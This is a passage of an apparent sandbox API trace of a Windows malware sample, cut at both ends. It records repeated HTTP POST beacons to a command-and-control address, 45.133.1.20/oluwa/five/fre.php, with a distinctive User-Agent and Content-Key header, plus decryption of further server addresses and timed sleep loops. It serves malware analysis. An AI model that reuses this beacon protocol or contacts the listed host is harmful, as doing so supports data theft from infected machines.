(lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0247.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.311] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0247.311] GetProcessHeap () returned 0x6a0000 [0247.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0247.311] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0247.311] GetProcessHeap () returned 0x6a0000 [0247.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0247.311] socket (af=2, type=1, protocol=6) returned 0x80c [0247.312] connect (s=0x80c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0247.338] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0247.338] GetProcessHeap () returned 0x6a0000 [0247.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0247.338] GetProcessHeap () returned 0x6a0000 [0247.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0247.338] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.339] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.339] GetProcessHeap () returned 0x6a0000 [0247.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4978 [0247.339] GetProcessHeap () returned 0x6a0000 [0247.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0247.340] GetProcessHeap () returned 0x6a0000 [0247.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0247.340] GetProcessHeap () returned 0x6a0000 [0247.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0247.341] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.342] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.342] GetProcessHeap () returned 0x6a0000 [0247.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0247.342] GetProcessHeap () returned 0x6a0000 [0247.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0247.343] send (s=0x80c, buf=0x6bd460*, len=242, flags=0) returned 242 [0247.344] send (s=0x80c, buf=0x6bb998*, len=159, flags=0) returned 159 [0247.344] GetProcessHeap () returned 0x6a0000 [0247.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0247.344] recv (in: s=0x80c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0247.427] GetProcessHeap () returned 0x6a0000 [0247.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0247.427] GetProcessHeap () returned 0x6a0000 [0247.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0247.428] GetProcessHeap () returned 0x6a0000 [0247.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4978 | out: hHeap=0x6a0000) returned 1 [0247.429] GetProcessHeap () returned 0x6a0000 [0247.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0247.429] closesocket (s=0x80c) returned 0 [0247.430] GetProcessHeap () returned 0x6a0000 [0247.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0247.430] GetProcessHeap () returned 0x6a0000 [0247.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.430] GetProcessHeap () returned 0x6a0000 [0247.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0247.431] GetProcessHeap () returned 0x6a0000 [0247.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0247.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x153c) returned 0x80c [0247.434] Sleep (dwMilliseconds=0xea60) [0247.435] GetProcessHeap () returned 0x6a0000 [0247.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0247.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.437] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0247.462] GetProcessHeap () returned 0x6a0000 [0247.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0247.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.464] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0247.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.476] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.481] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.481] GetProcessHeap () returned 0x6a0000 [0247.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0247.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.483] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0247.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.484] CryptDestroyKey (hKey=0x6ad020) returned 1 [0247.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.495] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0247.495] GetProcessHeap () returned 0x6a0000 [0247.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.497] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.501] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.502] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.503] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.503] GetProcessHeap () returned 0x6a0000 [0247.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0247.503] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.504] GetProcessHeap () returned 0x6a0000 [0247.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0247.504] GetProcessHeap () returned 0x6a0000 [0247.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.505] GetProcessHeap () returned 0x6a0000 [0247.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0247.505] GetProcessHeap () returned 0x6a0000 [0247.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0247.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0247.524] GetProcessHeap () returned 0x6a0000 [0247.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0247.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.526] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0247.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.527] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.528] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.529] GetProcessHeap () returned 0x6a0000 [0247.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0247.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.533] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0247.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.534] CryptDestroyKey (hKey=0x6ad020) returned 1 [0247.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.535] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0247.535] GetProcessHeap () returned 0x6a0000 [0247.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.538] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0247.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0247.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.541] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0247.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.545] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0247.545] GetProcessHeap () returned 0x6a0000 [0247.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0247.545] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0247.545] GetProcessHeap () returned 0x6a0000 [0247.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0247.545] socket (af=2, type=1, protocol=6) returned 0x810 [0247.545] connect (s=0x810, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0247.568] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0247.568] GetProcessHeap () returned 0x6a0000 [0247.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0247.568] GetProcessHeap () returned 0x6a0000 [0247.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0247.569] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.570] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.570] GetProcessHeap () returned 0x6a0000 [0247.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4af8 [0247.570] GetProcessHeap () returned 0x6a0000 [0247.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0247.571] GetProcessHeap () returned 0x6a0000 [0247.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0247.571] GetProcessHeap () returned 0x6a0000 [0247.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0247.572] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0247.573] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.573] GetProcessHeap () returned 0x6a0000 [0247.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0247.573] GetProcessHeap () returned 0x6a0000 [0247.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0247.573] send (s=0x810, buf=0x6bd460*, len=242, flags=0) returned 242 [0247.576] send (s=0x810, buf=0x6bb998*, len=159, flags=0) returned 159 [0247.576] GetProcessHeap () returned 0x6a0000 [0247.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0247.576] recv (in: s=0x810, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0247.634] GetProcessHeap () returned 0x6a0000 [0247.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0247.635] GetProcessHeap () returned 0x6a0000 [0247.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0247.636] GetProcessHeap () returned 0x6a0000 [0247.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4af8 | out: hHeap=0x6a0000) returned 1 [0247.639] GetProcessHeap () returned 0x6a0000 [0247.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0247.639] closesocket (s=0x810) returned 0 [0247.640] GetProcessHeap () returned 0x6a0000 [0247.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0247.640] GetProcessHeap () returned 0x6a0000 [0247.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.641] GetProcessHeap () returned 0x6a0000 [0247.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0247.641] GetProcessHeap () returned 0x6a0000 [0247.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0247.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1540) returned 0x810 [0247.644] Sleep (dwMilliseconds=0xea60) [0247.646] GetProcessHeap () returned 0x6a0000 [0247.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0247.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.647] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.658] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0247.669] GetProcessHeap () returned 0x6a0000 [0247.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dbcf8 [0247.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.670] CryptImportKey (in: hProv=0x6bef48, pbData=0x6dbcf8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0247.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.672] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.673] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.673] GetProcessHeap () returned 0x6a0000 [0247.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbcf8 | out: hHeap=0x6a0000) returned 1 [0247.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.676] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0247.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.728] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0247.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.729] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0247.735] GetProcessHeap () returned 0x6a0000 [0247.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.736] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.737] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.738] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.739] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.739] GetProcessHeap () returned 0x6a0000 [0247.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0247.739] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.740] GetProcessHeap () returned 0x6a0000 [0247.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0247.740] GetProcessHeap () returned 0x6a0000 [0247.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.741] GetProcessHeap () returned 0x6a0000 [0247.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0247.741] GetProcessHeap () returned 0x6a0000 [0247.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0247.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0247.770] GetProcessHeap () returned 0x6a0000 [0247.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0247.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.772] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0247.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.773] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.774] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.774] GetProcessHeap () returned 0x6a0000 [0247.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0247.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.776] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0247.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.777] CryptDestroyKey (hKey=0x6ad060) returned 1 [0247.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.779] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0247.779] GetProcessHeap () returned 0x6a0000 [0247.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.780] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0247.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.781] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0247.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.783] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0247.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.784] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0247.784] GetProcessHeap () returned 0x6a0000 [0247.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0247.784] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0247.784] GetProcessHeap () returned 0x6a0000 [0247.784] RtlAllocateHeap 